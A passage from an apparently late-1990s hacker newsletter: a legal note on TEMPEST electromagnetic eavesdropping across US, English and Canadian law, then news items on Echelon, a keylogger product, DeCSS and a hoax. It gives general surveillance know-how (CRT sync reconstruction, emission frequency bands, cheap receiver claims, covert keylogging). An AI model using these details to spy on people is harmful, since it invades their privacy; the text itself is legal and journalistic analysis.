kilometer distant; reconstructing the contents of a computer's memory. For a discussion of the TEMPEST ELINT threat See e.g., Memory Bank, AMERICAN BANKER 20 (Apr 1 1985); Emissions from Bank Computer Systems Make Eavesdropping Easy, Expert Says, AMERICAN BANKER 1 (Mar 26 1985); CRT spying: a threat to corporate security, PC WEEK (Mar 10 1987). By selectively firing the gun as it scans across the face of the CRT, the pixels form characters on the CRT screen. ELINT is not limited to governments. It is routinely used by individuals for their own purposes. Almost all forms of ELINT are available to the individual with either the technological expertise or the money to hire someone with the expertise. Governments have attempted to criminalize all use of ELINT by their subjects --to protect the privacy of both the government and the population. II. UNITED STATES LAW In the United States, Title III of the Omnibus Streets and Crimes Act of 1968 criminalizes trespassatory ELINT as the intentional interception of wire communications. As originally passed, Title III did not prohibit non-trespassatory ELINT, because courts found that non-wire communication lacked any expectation of privacy. The Electronic Communications Privacy Act of 1986 amended Title III to include non-wire communication. ECPA was specifically designed to include electronic mail, inter computer communications, and cellular telephones. To accomplish this, the expectation of privacy test was eliminated. As amended, Title III still outlaws the electronic interception of communications. The word "communications" indicates that someone is attempting to communicate something to someone; it does not refer to the inadvertent transmission of information. The reception and reconstruction of emanated transient electromagnetic pulses (ETEP), however, is based on obtaining information that the target does not mean to transmit. If the ETEP is not intended as communication, and is therefore not transmitted in a form approaching current communications protocols, then it can not be considered communications as contemplated by Congress when it amended Title III. Reception, or interception, of emanated transient electromagnetic pulses is not criminalized by Title III as amended. III. ENGLISH LAW In England the Interception of Communications Act 1985 criminalizes the tapping of communications sent over public telecommunications lines. The interception of communications on a telecommunication line can take place with a physical tap on the line, or the passive interception of microwave or satellite links. These forms of passive interception differ from TEMPEST ELINT because they are intercepting intended communication; TEMPEST ELINT intercepts unintended communication. Eavesdropping on the emanations of computers does not in any way comport to tapping a telecommunication line and therefore falls outside the scope of the statute. IV. CANADIAN LAW Canada has taken direct steps to limit eavesdropping on computers.The Canadian Criminal Amendment Act of 1985 criminalized indirect access to a computer service. The specific reference to an "electromagnetic device" clearly shows the intent of the legislature to include the use of TEMPEST ELINT equipment within the ambit of the legislation. The limitation of obtaining "any computer service" does lead to some confusion. The Canadian legislature has not made it clear whether "computer service" refers to a computer service bureau or merely the services of a computer. If the Canadians had meant access to any computer, why did they refer to any "computer service". This is especially confusing considering the all-encompassing language of (b) 'any function of a computer system'. Even if the Canadian legislation criminalizes eavesdropping on all computers, it does not solve the problem of protecting the privacy of information. The purpose of criminal law is to control crime. Merely making TEMPEST ELINT illegal will not control its use. First, because it is an inherently passive crime it is impossible to detect and hence punish. Second, making this form of eavesdropping illegal without taking a proactive stance in controlling compromising emanations gives the public a false sense of security. Third, criminalizing the possession of a TEMPEST ELINT device prevents public sector research into countermeasures. Finally, the law will not prevent eavesdropping on private information held in company computers unless disincentives are given for companies that do not take sufficient precautions against eavesdropping and simple, more common, information crimes. V. SOLUTIONS TEMPEST ELINT is passive. The computer or terminal emanates compromising radiation which is intercepted by the TEMPEST device and reconstructed into useful information. Unlike conventional ELINT there is no need to physically trespass or even come near the target. Eavesdropping can be performed from a nearby office or even a van parked within a reasonable distance. This means that there is no classic scene of the crime; and little or no chance of the criminal being discovered in the act. If the crime is discovered it will be ancillary to some other investigation. For example, if an individual is investigated for insider trading a search of his residence may yield a TEMPEST ELINT device. The device would explain how the defendant was obtaining insider information; but it was the insider trading, not the device, that gave away the crime. This is especially true for illegal TEMPEST ELINT performed by the state. Unless the perpetrators are caught in the act there is little evidence of their spying. A trespassatory bug can be detected and located; further, once found it provides tangible evidence that a crime took place. A TEMPEST ELINT device by its inherent passive nature leaves nothing to detect. Since the government is less likely to commit an ancillary crime which might be detected there is a very small chance that the spying will ever be discovered. The only way to prevent eavesdropping is to encourage the use of countermeasures TEMPEST Certified computers and terminals. In merely making TEMPEST ELINT illegal the public is given the false impression of security; they are lulled into believing the problem has been solved. Making certain actions illegal does not prevent them from occurring. This is especially true for a TEMPEST ELINT because it is undetectable. Punishment is an empty threat if there is no chance of being detected; without detection there can be no apprehension and conviction. The only way to prevent some entity from eavesdropping on one's computer or computer terminal is for the equipment not to give off compromising emanation; it must be TEMPEST Certified. The United States can solve this problem by taking a proactive stance on compromising emanations. The National Institute of Standards and Technology (NIST) is in charge of setting forth standards of computer security for the private sector. NIST is also charged with doing basic research to advance the art of computer security. Currently NIST does not discuss TEMPEST with the private sector. For privacy's sake, this policy must be changed to a proactive one. The NIST should publicize the TEMPEST ELINT threat to computer security and should set up a rating system for level of emanations produced by computer equipment. Further, legislation should be enacted to require the labeling of all computer equipment with its level of emanations and whether it is TEMPEST Certified. Only if the public knows of the problem can it begin to take steps to solve it. Title III makes possession of a surveillance device a crime, unless it is produced under contract to the government. This means that research into surveillance and counter-surveillance equipment is monopolized by the government and a few companies working under contract with NACSIM 5100A is classified, as are all details of TEMPEST. To obtain access to it, contractor must prove that there is demand within the government for the specific type of equipment that intend to certify. Since the standard is classified, the contractors can not sell the equipment to non-secure governmental agencies or the public. This prevents reverse engineering of the standard for its physical embodiment, the Certified equipment. By preventing the private sector from owning this anti-eavesdropping equipment, the NSA has effectively prevented the them from protecting the information in their computers. If TEMPEST eavesdropping is criminalized, then possession of TEMPEST ELINT equipment will be criminal. Unfortunately,this does not solve the problem. Simple TEMPEST ELINT equipment is easy to make. For just a few dollars many older television sets can be modified to receive and reconstruct EMR. For less than a hundred dollars a more sophisticated TEMPEST ELINT receiver can be produced. The problem with criminalizing the possession of TEMPEST ELINT equipment is not just that the law will have little effect on the use of such equipment, but that it will have a negative effect on countermeasures research. To successfully design countermeasures to a particular surveillance technique it is vital to have a complete empirical understanding of how that technique works. Without the right to legally manufacture a surveillance device there is no possible way for a researcher to have the knowledge to produce an effective countermeasures device. It is axiomatic: without a surveillance device, it is impossible to test a countermeasures device. A number of companies produce devices to measure the emanations from electrical equipment. Some of these devices are specifically designed for bench marking TEMPEST Certified equipment. This does not solve the problem. The question arises: how much radiation at a particular frequency is compromising? The current answer is to refer to NACSIM 5100A. This document specifies the emanations levels suitable for Certification. The document is only available to United States contractors having sufficient security clearance and an ongoing contract to produce TEMPEST Certified computers for the government. Further, the correct levels are specified by the NSA and there is no assurance that, while these levels are sufficient to prevent eavesdropping by unfriendly operatives, equipment certified under NACSIM 5100A will have levels low enough to prevent eavesdropping by the NSA itself. The accessibility of supposedly correct emanations levels does not solve the problem of preventing TEMPEST eavesdropping. Access to NACSIM 5100A limits the manufacturer to selling the equipment only to United States governmental agencies with the need to process secret information. Without the right to possess TEMPEST ELINT equipment manufacturers who wish to sell to the public sector cannot determine what a safe level of emanations is. Further those manufacturers with access to NACSIM 5100A should want to verify that the levels set out in the document are, in fact, low enough to prevent interception. Without an actual eavesdropping device with which to test, no manufacturer will be able to produce genuinely uncompromising equipment. Even if the laws allow ownership of TEMPEST Certified equipment by the public, and even if the public is informed of TEMPEST's threat to privacy, individuals' private information will not necessarily by protected. Individuals may choose to protect their own information on their own computers. Companies may choose whether to protect their own private information. But companies that hold the private information of individuals must be forced to take steps to protect that information. In England the Data Protection Act 1984 imposes sanctions against anyone who stores the personal information on a computer and fails to take reasonable measures to prevent disclosure of that information. The act mandates that personal data may not be stored in any computer unless the computer bureau or data user has registered under the act. This provides for a central registry and the tracking of which companies or persons maintain databases of personal information. Data users and bureaus must demonstrate a need and purpose behind their possession of personal data. The act provides tort remedies to any person who is damaged by disclosure of the personal data. Reasonable care to prevent the disclosure is a defense. English courts have not yet ruled what level of computer security measures constitute reasonable care. Considering the magnitude of invasion possible with TEMPEST ELINT it should be clear by now that failure to use TEMPEST Certified equipment is prima facie unreasonable care. The Remedies section of the act provides incentive for these entities to provide successful protection of person data from disclosure or illicit access. Failure to protect the data will result in monetary loss. This may be looked at from the economic efficiency viewpoint as allocating the cost of disclosure the persons most able to bear those costs, and also most able to prevent disclosure. Data users that store personal data would use TEMPEST Certified equipment as part of their computer security plan, thwarting would-be eavesdroppers. The Data Protection Act 1984 allocates risk to those who can bear it best and provides an incentive for them to keep other individuals' data private. This act should be adopted by the United States as part of a full-spectrum plan to combat TEMPEST eavesdropping. Data users are in the best position to prevent disclosure through proper computer security. Only by making them liable for failures in security can we begin to rein in TEMPEST ELINT. VII Recommendations Do not criminalize TEMPEST ELINT. Most crimes that TEMPEST ELINT would aid, such a insider trading, are already illegal; the current laws are adequate. The National Institute of Standards and Technology should immediately begin a program to educate the private sector about TEMPEST. Only if individuals are aware of the threat can they take appropriate precautions or decide whether any precautions are necessary. Legislation should be enacted to require all electronic equipment to prominently display its level of emanations and whether it is TEMPEST Certified. If individuals are to choose to protect themselves they must be able to make a informed decision regarding how much protection is enough. TEMPEST Certified equipment should be available to the private sector. The current ban on selling to non-governmental agencies prevents individuals who need to protect information from having the technology to do so. Possession of TEMPEST ELINT equipment should not be made illegal. The inherently passive nature and simple design of TEMPEST ELINT equipment means that making its possession illegal will not deter crime; the units can be easily manufactured and are impossible to detect. Limiting their availability serves only to monopolize the countermeasures research, information, and equipment for the government; this prevents the testing, design and manufacture of countermeasures by the private sector. Legislation mirroring England's Data Protection Act 1984 should be enacted. Preventing disclosure of personal data can only be accomplished by giving those companies holding the data a reason to protect it. If data users are held liable for their failure to take reasonable security precautions they will begin to take reasonable security precautions, including the use of TEMPEST Certified equipment. References: 1. Undelivered speech of President John F. Kennedy, Dallas Citizens Council (Nov. 22, 1963) 35-36. 2. TEMPEST is an acronym for Transient Electromagnetic Pulse Emanation Standard. This standard sets forth the official views of the United States on the amount of electromagnetic radiation that a device may emit without compromising the information it is processing. TEMPEST is a defensive standard; a device which conforms to this standard is referred to as TEMPEST Certified. The United States government has refused to declassify the acronym for devices used to intercept the electromagnetic information of non-TEMPEST Certified devices. For this note, these devices and the technology behind them will also be referred to as TEMPEST; in which case, TEMPEST stands for Transient Electromagnetic Pulse Surveillance Technology. The United States government refuses to release details regarding TEMPEST and continues an organized effort to censor the dissemination of information about it. For example the NSA succeeded in shutting down a Wang Laboratories presentation on TEMPEST Certified equipment by classifying the contents of the speech and threatening to prosecute the speaker with revealing classified information. The pixels glow for only a very short time and must be routinely struck by the electron beam to stay lit. To maintain the light output of all the pixels that are supposed to be lit, the electron beam traverses the entire CRT screen sixty times a second. Every time the beam fires it causes a high voltage EMR emission. This EMR can be used to reconstruct the contents of the target CRT screen. TEMPEST ELINT equipment designed to reconstruct the information synchronizes its CRT with the target CRT. First, it uses the EMR to synchronize its electron gun with the electron gun in the target CRT. Then, when the TEMPEST ELINT unit detects EMR indicating that the target CRT fired on a pixel, the TEMPEST ELINT unit fires the electron gun of its CRT. The ELINT CRT is in perfect synchronism with the target CRT; when the target lights a pixel, a corresponding pixel on the TEMPEST ELINT CRT is lit. The exact picture on the target CRT will appear on the TEMPEST ELINT CRT. Any changes on the target screen will be instantly reflected in the TEMPEST ELINT screen. TEMPEST Certified equipment gives off emissions levels that are too faint to be readily detected. Certification levels are set out in National Communications Security Information Memorandum 5100A (NACSIM 5100A). "Emission levels are expressed in the time and frequency domain, broadband or narrow band in terms of the frequency domain, and in terms of conducted or radiated emissions." White, supra, note 9, 10.1. For a thorough though purposely misleading discussion of TEMPEST ELINT see Van Eck, Electromagnetic Radiation from Video Display units: An Eavesdropping Risk?, 4 Computers & Security 269 (1985). [See: http://jya.com/emr.pdf ] 3. This Note will not discuss how TEMPEST relates to the Warrant Requirement under the United States Constitution. Nor will it discuss the Constitutional exclusion of foreign nationals from the Warrant Requirement. Protecting privacy under TEMPEST should be made freely available; TEMPEST Certified equipment should be legally available; and organizations possessing private information should be required by law to protect that information through good computer security practices and the use of TEMPEST Certified equipment. 4. HUMINT has been used by the United States since the Revolution. "The necessity of procuring good intelligence is apparent & need not be further urged -- All that remains for me to add is, that you keep the whole matter as secret as possible. For upon Secrecy, Success depends in Most Enterprises of the kind, and for want of it, they are generally defeated, however well planned & promising a favorable issue." Letter of George Washington (Jul. 26, 1777). 5. "... I wish you to take every possible pains in your powers, by sending trusty persons to Staten Island in whom you can confide, to obtain Intelligence of the Enemy's situation & numbers -- what kind of Troops they are, and what Guards they have -- their strength & where posted." Id. 6. Eavesdrip is an Anglo-Saxon word, and refers to the wide overhanging eaves used to prevent rain from falling close to a house's foundation. The eavesdrip provided "a sheltered place where one could hide to listen clandestinely to conversation within the house." W. MORRIS & M. MORRIS, MORRIS DICTIONARY OF WORD AND PHRASE ORIGINS, (1977). 7. Pursglove, How Russian Spy Radios Work, RADIO ELECTRONICS, 89-91 (Jan 1962). 8. Interception is an espionage term of art and should be differentiated from its more common usage. When information is intercepted, the interceptor as well as the intended recipient receive the information. Interception when not used as a term of art refers to one person receiving something intended for someone else; the intended recipient never receives what he was intended to receive. 9. There are two types of emissions, conducted and radiated. Radiated emissions are formed when components or cables act as antennas for transmitting the EMR; when radiation is conducted along cables or other connections but not radiated it is referred to as "conducted". Sources include cables, the ground loop, printed circuit boards, internal wires, the power supply to power line coupling, the cable to cable coupling, switching transistors, and high-power amplifiers. WHITE & M. MARDIGUIAN, EMI CONTROL METHODOLOGY AND PROCEDURES, 10.1 (1985). "[C]ables may act as an antenna to transmit the signals directly or even both receive the signals and re-emit them further away from the source equipment. It is possible that cables acting as an antenna in such a manner could transmit the signals much more efficiently than the equipment itself...A similar effect may occur with metal pipes such as those for domestic water supplies. ... If an earthing [(grounding)] system is not installed correctly such that there is a path in the circuit with a very high resistance (for example where paint prevents conduction and is acting as an insulator), then the whole earthing system could well act in a similar fashion to an antenna. ... [For a VDU] the strongest signals, or harmonics thereof, are usually between 60-250 MHz approximately. There have however been noticeable exception of extremely strong emissions in the television bands and at higher frequencies between 450-800 MHz. Potts, Emission Security, 3 COMPUTER LAW AND SECURITY REPORT 27 (1988). 10. The TEMPEST ELINT operator can distinguish between different VDUs in the same room because of the different EMR characteristics of both homo and heterogeneous units. "There is little comparison between EMR characteristics from otherwise comparable equipment. Only if the VDU was made with exactly the same components is there any similarity. If some of the components have come from a different batch, have been updated in some way, and especially if they are from a different manufacturer, then completely different results are obtained. In this way a different mark or version of the same [VDU] will emit different signals. Additionally because of the variation of manufacturing standards between counties, two VDUs made by the same company but sourced from different counties will have entirely different EMR signal characteristics...From this it way be thought that there is such a jumble of emissions around, that it would not be possible to isolate those from any one particular source. Again, this is not the case. Most received signals have memory or the contents of its mass storage devices is more complicated and must be performed from a closer distance. The reconstruction of information via EMR, a process for which the United States government refuses to declassify either the exact technique or even its name, is not limited to computers and digital devices but is applicable to all devices that generate electromagnetic radiation. TEMPEST is especially effective against VDUs because they produce a very high level of EMR, a different line synchronization, due to design, reflection, interference or variation of component tolerances. So that if for instance there are three different signals on the same frequency ... by fine tuning of the RF receiver, antenna manipulation and modification of line synchronization, it is possible to lock onto each of the three signals separately and so read the screen information. By similar techniques, it is entirely possible to discriminate between individual items of equipment in the same room." Potts, supra note 9. 11. TEMPEST is concerned with the transient electromagnetic pulses formed by digital equipment. All electronic equipment radiates EMR which may be reconstructed. Digital equipment processes information as 1's and 0's -- on's or off's. Because of this, digital equipment gives off pulses of EMR. These pulses are easier to reconstruct at a distance than the non-pulse EMR given off by analog equipment. For a thorough discussion the radiation problems of broadband digital information see e.g. military standard MIL-STD-461 REO2; White supra note 9, 10.2. 12. See supra note 2. 13. Of special interest to ELINT collectors are EMR from computers, communications centers and avionics. Schultz, Defeating Ivan with TEMPEST, DEFENSE ELECTRONICS 64 (June 1983). 14. The picture on a CRT screen is built up of picture elements (pixels) organized in lines across the screen. The pixels are made of material that fluoresces when struck with energy. The energy is produced by a beam of electrons fired from an electron gun in the back of the picture tube. The electron beam scans the screen of the CRT in a regular repetitive manner. When the voltage of the beam is high then the pixel it is focused upon emits photons and appears as a dot on the screen. 15. Pub. L. No. 90-351, 82 Stat. 197. The Act criminalizes trespassatory ELINT by individuals as well as governmental agents. cf. Katz v. United States, 389 U.S. 347 (1967) (Fourth Amendment prohibits surveillance by government not individuals.) 16. 18 U.S.C. 2511(1)(a). 17. United States v. Hall, 488 F.2d 193 (9th Cir. 1973) (found no legislative history indicating Congress intended the act to include radio-telephone conversations). Further, Title III only criminalized the interception of "aural" communications which excluded all forms of computer communications. 18. Willamette Subscription Television v. Cawood, 580 F.Supp 1164 (D. Or. 1984) (non-wire communications lacks any expectation of privacy). 19. Pub. L. No. 99-508, 100 Stat. 1848 (codified at 18 U.S.C. 2510-710) [hereinafter ECPA]. 20. 18 U.S.C. 2511(1)(a) criminalizes the interception of "any wire, oral or electronic communication" without regard to an expectation of privacy. 21. Interception of Communications Act 1985, Long Title, An Act to make new provision for and in connection with the interception of communications sent by post or by means of public telecommunications systems and to amend section 45 of the Telecommunications Act 1984. 22. Interception of Communications Act 1985 1, Prohibition on Interception: (1) Subject to the following provisions of this section, a person who intentionally intercepts a communication in the course of its transmission by post or by means of a public telecommunications system shall be guilty of an offence and liable-- (a) on summary conviction, to a fine not exceeding the statutory maximum; (b) on conviction on indictment, to imprisonment for a term not exceeding two years or to a fine or to both. *** 23. Tapping (aka trespassatory eavesdropping) is patently in violation of the statute. "The offense created by section 1 of the Interception of Communications Act 1985 covers those forms of eavesdropping on computer communications which involve "tapping" the wires along which messages are being passed. One problem which may arise, however, is the question of whether the communication in question was intercepted in the course of its transmission by means of a public telecommunications system. It is technically possible to intercept a communication at several stages in its transmission, and it may be a question of fact to decide the stage at which it enters the "public" realm. THE LAW COMMISSION,WORKING PAPER NO. 110: COMPUTER MISUSE, 3.30 (1988). 24. "There are also forms of eavesdropping which the Act does not cover. For example. eavesdropping on a V.D.U. [referred to in this text as a CRT] screen by monitoring the radiation field which surrounds it in order to display whatever appears on the legitimate user's screen on the eavesdropper's screen. This activity would not seem to constitute any criminal offence..." THE LAW COMMISSION, WORKING PAPER NO. 110: COMPUTER MISUSE, 3.31 (1988). 25. 301.2(1) of the Canadian criminal code states that anyone who: ... without color of right, (a) obtains, directly or indirectly, any computer service, (b) by means of an electromagnetic ... or other device, intercepts or causes to be intercepted, either directly or indirectly, any function of a computer system ... [is guilty of an indictable offence]. 26. UNITED STATES SENTENCING COMM'N, FEDERAL SENTENCING GUIDELINES MANUAL (1988) (Principles Governing the Redrafting of the Preliminary Guidelines "g." (at an unknown page)) 27. There has been great debate over what exactly is a computer crime. There are several schools of thought. The more articulate school, and the one to which the author adheres holds that the category computer crime should be limited to crimes directed against computers; for example, a terrorist destroying a computer with explosives would fall into this category. Crimes such as putting ghost employees on a payroll computer and collecting their pay are merely age-old accounting frauds; today the fraud involves a computer because the records are kept on a computer. The computer is merely ancillary to the crime. This has been mislabeled computer crime and should merely be referred to as a fraud perpetrated with the aid of a computer. Finally, there are information crimes. These are crimes related to the purloining or alteration of information. These crimes are more common and more profitable due to the computer's ability to hold and access great amounts of information. TEMPEST ELINT can best be categorized as a information crime. 28. Compare, for example, the Watergate break-in in which the burglars were discovered when they returned to move a poorly placed spread spectrum bug. 29. TEMPEST Certified refers to the equipment having passed a testing and emanations regime specified in NACSIM 5100A. This classified document sets forth the emanations levels that the NSA believes digital equipment can give off without compromising the information it is processing. TEMPEST Certified equipment is theoretically secure against TEMPEST eavesdropping. 30. Previously the Bureau of Standards. The NIST is a division of the Commerce Department. 31. In this case computer equipment would include all peripheral computer equipment. There is no use is using a TEMPEST Certified computer if the printer or the modem are not Certified. 32. The NSA has tried to limit the availability of TEMPEST information to prevent the spread of the devices. For a discussion of the First Amendment and prior restraint See, e.g. The United States of America v. Progressive, Inc. 467 F.Supp 990 (1979, WD Wis.) (magazine intended to publish plans for nuclear weapon; prior restraint injunction issued), reh. den. United States v. Progressive Inc. 486 F.Supp 5 (1979, WD Wis.), motion den.; Morland v. Sprecher 443 US 709 (1979) (mandamus), motion denied; United States v. Progressive, Inc. 5 Media L R (1979, 7th Cir.), dismd. without op.; U.S. v. Progressive, Inc 610 F.2d 819 (1979, 7th Cir.); New York Times, Co. v. United States, 403 U.S. 713 (1971) (per curium) (Pentagon Papers case: setting forth prior restraint standard which government was unable to meet); T. EMERSON, THE SYSTEM OF FREEDOM OF EXPRESSION (1970); Balance Between Scientific Freedom and National Security, 23 JURIMETRICS J. 1 (1982) (current laws and regulations limiting scientific and technical expression exceed the legitimate needs of national security); Hon. M. Feldman, Why the First Amendment is not Incompatible with National Security, HERITAGE FOUNDATION REPORTS (Jan. 14, 1987). Compare Bork, Neutral Principles and Some First Amendment Problems, 47 IND. L. J. 1 (First Amendment applies only to political speech); G. Lewy, Can Democracy Keep Secrets, 26 POLICY REVIEW 17 (1983)(endorsing draconian secrecy laws mirroring the English system). 33. For example, the NSA has just recently allowed the Drug Enforcement Agency (DEA) to purchase TEMPEST Certified computer equipment. The DEA wanted secure computer equipment because wealthy drug lords had were using TEMPEST eavesdropping equipment. 34. An Act to regulate the use of automatically processed information relating to individuals and the provision of services in respect of such information. - Data Protection Act 1984, Long Title. 35. "Personal data" means data consisting of information which relates to a living individual who can be identified from that 36. "Data user" means a person who holds data, and a persons "Holds" data if -- (a) the data form part of a collection of data processed or intended to be processed by or on behalf of that person as mentioned in subsection (2) above; [subsection (2) defines "data"] and (b) that person (either alone or jointly or in common with other persons) controls the contents and use of the data comprised in the collection; and (c) the data are in the form in which they have been or are intended to be processed as mentioned in paragraph (a) above or (though not for the time being in that form) in a form into which they have been converted after being so processed and with a view to being further so processed on a subsequent occasion. - Data Protection Act 1(5). 37. Data Protection Act 1984, 4,5. 38. An individual who is the subject of personal data held by a data user... and who suffers damage by reason of (1)(c) ... the disclosure of the data, or access having been obtained to the data without such authority as aforesaid shall be entitled to compensation from the data user... for any distress which the individual has suffered by reason of the ... disclosure or access. - Data Protection Act 1984 23. 39. ... it shall be a defense to prove that ... the data user ... had taken such care as in all the circumstances was reasonably required to prevent the... disclosure or access in question. - Data Protection Act 1984 23(3). @HWA 15.0 Russians Seize Nuclear Expert's Computer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by EvilWench The computer of Joshua Handler, a Princeton University specialist in nuclear radiation and security has had his computer and documents seized by the Russian Secret Service (FSB). Russia Today http://www.russiatoday.com/news.php3?id=105308 FSB Seizes Computer, Notes, From U.S. Nuclear Expert MOSCOW, Oct 29, 1999 -- (Agence France Presse) Russia's secret service seized a computer and documents from the Moscow apartment of a US nuclear security expert, the Interfax news agency reported Thursday, citing a Russian colleague. The FSB, successor to the KGB, seized the computer, research documents, manuscripts and notes from the apartment of Joshua Handler, a Princeton University specialist in nuclear radiation and security, the colleague, Alexei Yablokov, told Interfax. The seizure took place on Wednesday, he said. ((c) 1999 Agence France Presse) @HWA 16.0 Sir Dystic and Kevin Poulsen to Speak ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by s_d Sir Dystic, creator of the original Back Orifice, and Kevin Poulsen, currently a columnist for ZD Net, will be speaking at the 16th World Conference on Computer Security and Control on November 3 1999. The conference will be held in London England. Compsec International 99 http://www.elsevier.nl:80/homepage/sag/compsec99/menu2.htm @HWA 17.0 Invisible KeyLogger97 ~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond C|Net has listed what it calls the top 10 technology products that will "scare you to death"! Number 8 on that list is Invisible KeyLogger 97 designed to capture every keystroke including passwords. (This is yet another commercial Back Orifice like product. Why are the Anti-Virus companies refusing to release definitions for these?) C|Net http://www.cnet.com/Content/Gadgets/Guides/Terrors/ss03.html KeyLogger http://www.keylogger.com/ Invisible KeyLogger 97 Trick: Logs every keystroke in Windows. Treat: Your enemy has a record of every email message and document you type. If you have to leave your computer unattended and want to make sure that no one tampers with it, install Invisible KeyLogger 97 (IK97). It silently grabs every Windows keystroke and adds it to a log file, essentially recording everything that happens while you're away. You can also use IK97 to monitor your children's PC use and to provide backup copies of everything that you type. This is a great tool, but what if someone else were to secretly install IK97 on your PC and monitor you? If you share a workstation, or if someone gets to your system when it's unattended, IK97 can be used to steal your passwords and record your private email and documents. Remember that message you sent about your boss's ugly hairdo? You deleted it from your out-box, but IK97 still has a copy of it. To find out if IK97 is running on your system, hit Ctrl-Alt-Delete. If you see a program called ik in the Close Program dialog box, that's Invisible KeyLogger 97, and you can stop it by selecting End Task. Unfortunately, however, IK97 has a sibling called Invisible KeyLogger Stealth (IKS) that doesn't show up in the dialog box since it's a virtual device driver (VxD) and not an application. So, if it's watching you, you're out of luck. To make sure you don't get spied on, change your passwords frequently, and work on confidential or incriminating files on your home PC. IK97 might be watching. @HWA 18.0 Hoax: Gov-boi Killed in Car Accident (not) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by deepquest, Cruciphux and mosthated Gov-boi, aka Insanity (Rick Stoeppelwerth), of http://www.hack.co.za passed away Sunday night in a terrible car accident. His loss is a tragedy and his security expertise will be greatly missed by all who knew him. He was known on irc as gov-boi or hotmetal. http://www.hack.co.za/ The Stamford Advocate http://www.stamfordadvocate.com/Advocate/release/10-31-1999/article1.html Gov-boi pulled one over on us, and put up a notice on his website saying that he had died in a car accident after a discussion on IRC where it was suggested he be a 'ghost hacker' for halloween. So he took it one step further and pretended he had passed away, staying off irc with his nick ppl assumed it was true, there was also an article (Stamford advocate) that was attached to the story which is actually about some other poor soul that died around the same time gov-boi was supposed to have died. I emailed the story to hackernews and apparently so did several other ppl who were sucked in to the story before finding out it was all a hoax. Insanity however (Rick Stoeppelwerth) did die in a car crash and it was the story that added credence to the claim, although Stamford is a long way from .za (South Africa) where gov-boi lives. Sorry to all involved for providing incorrect info and condolences to Insanity and his family for their loss. @HWA 19.0 Australia Admits to Echelon ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no-one The Inspector General of Intelligence and Security for Australia, Bill Blick, has told the BBC that Australia's Defense Signals Directorate (DSD) is indeed part of the global eavesdropping network known as Echelon. Both the US and Britain still deny the existence of this network. BBC http://news.bbc.co.uk/hi/english/world/newsid_503000/503224.stm World Global spy network revealed Listening in to your phone calls and reading your emails By Andrew Bomford of BBC Radio 4's PM programme Imagine a global spying network that can eavesdrop on every single phone call, fax or e-mail, anywhere on the planet. It sounds like science fiction, but it's true. Two of the chief protagonists - Britain and America - officially deny its existence. But the BBC has confirmation from the Australian Government that such a network really does exist and politicians on both sides of the Atlantic are calling for an inquiry. On the North Yorkshire moors above Harrogate they can be seen for miles, but still they are shrouded in secrecy. Around 30 giant golf balls, known as radomes, rise from the US military base at Menwith Hill. Linked to the NSA Inside is the world's most sophisticated eavesdropping technology, capable of listening-in to satellites high above the earth. The base is linked directly to the headquarters of the US National Security Agency (NSA) at Fort Mead in Maryland, and it is also linked to a series of other listening posts scattered across the world, like Britain's own GCHQ. The power of the network, codenamed Echelon, is astounding. Every international telephone call, fax, e-mail, or radio transmission can be listened to by powerful computers capable of voice recognition. They home in on a long list of key words, or patterns of messages. They are looking for evidence of international crime, like terrorism. Open Oz The network is so secret that the British and American Governments refuse to admit that Echelon even exists. But another ally, Australia, has decided not to be so coy. The man who oversees Australia's security services, Inspector General of Intelligence and Security Bill Blick, has confirmed to the BBC that their Defence Signals Directorate (DSD) does form part of the network. "As you would expect there are a large amount of radio communications floating around in the atmosphere, and agencies such as DSD collect those communications in the interests of their national security", he said. Asked if they are then passed on to countries like Britain and America, he said: "They might be in certain circumstances." But the system is so widespread all sorts of private communications, often of a sensitive commercial nature, are hoovered up and analysed. Journalist Duncan Campbell has spent much of his life investigating Echelon. In a report commissioned by the European Parliament he produced evidence that the NSA snooped on phone calls from a French firm bidding for a contract in Brazil. They passed the information on to an American competitor, which won the contract. "There's no safeguards, no remedies, " he said, "There's nowhere you can go to say that they've been snooping on your international communications. Its a totally lawless world." Breaking the silence Both Britain and America deny allegations like this, though they refuse to comment further. But one former US army intelligence officer has broken the code of silence. Colonel Dan Smith told the BBC that while this is feasible, it is not official policy: "Technically they can scoop all this information up, sort through it, and find what it is that might be asked for," he said. "But there is no policy to do this specifically in response to a particular company's interests." Legislators on both sides of the Atlantic are beginning to sit up and take notice. Republican Congressman Bob Barr has persuaded congress to open hearings into these and other allegations. In December he is coming to Britain to raise awareness of the issue. In an interview with the BBC he accused the NSA of conducting a broad "dragnet" of communications, and "invading the privacy of American citizens." He is joined in his concerns by a small number of politicians In Britain. Liberal Democrat MP Norman Baker has tabled a series of questions about Menwith Hill, but has been met with a wall of silence. "There's no doubt it's being used as a listening centre," he said, "There's no doubt it's being used for US interests, and I'm not convinced that Britain's interests are being best served by this." @HWA 20.0 DVD Copy Protection Broken ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Because developers implemented the copy protection scheme of DVD disks improperly it was easily broken. One DVD content publisher failed to encrypt the decryption key on their disks. This allowed the Masters of Reverse Engineering (MoRE) from Norway, to 'guess' other publishers keys. They then developed the DeCSS utility that can copy a DVD movie. Wired http://www.wired.com/news/technology/0,1282,32263,00.html Why the DVD Hack Was a Cinch by Andy Patrizio 2:15 p.m. 2.Nov.1999 PST The anonymous developers of the decryption program that removes DVD copy protection had an easy time doing it, thanks to a gaffe by a software developer and the surprising weakness of the encryption technology. Essentially, the two European hackers who developed the DeCSS utility that copies a DVD movie disc were able to break the code because one of the product's licensees inadvertently neglected to encrypt the decryption key. Industry experts were stunned by the hack because DVD as a movie-playing format is supposed to be copy-proof. In fact, DVD would not be on the market today without the permission of the motion picture industry which, sources say, is reeling from this development. Breaking DVD's encryption was considered extremely difficult, but once the first key was discovered, the rest fell with ease, since the crackers were able to use their original, valid key as a launch point to find more valid decryption keys. DeCSS is a tiny (60 KB) utility that copies the encrypted DVD video file, which has a .VOB extension, and saves it to the hard disc without encryption. Since DVD movies can range in size from 4.7 GB to 9.4 GB and recordable DVD has at best 2.5 capacity (or 5.2GB for double-sided 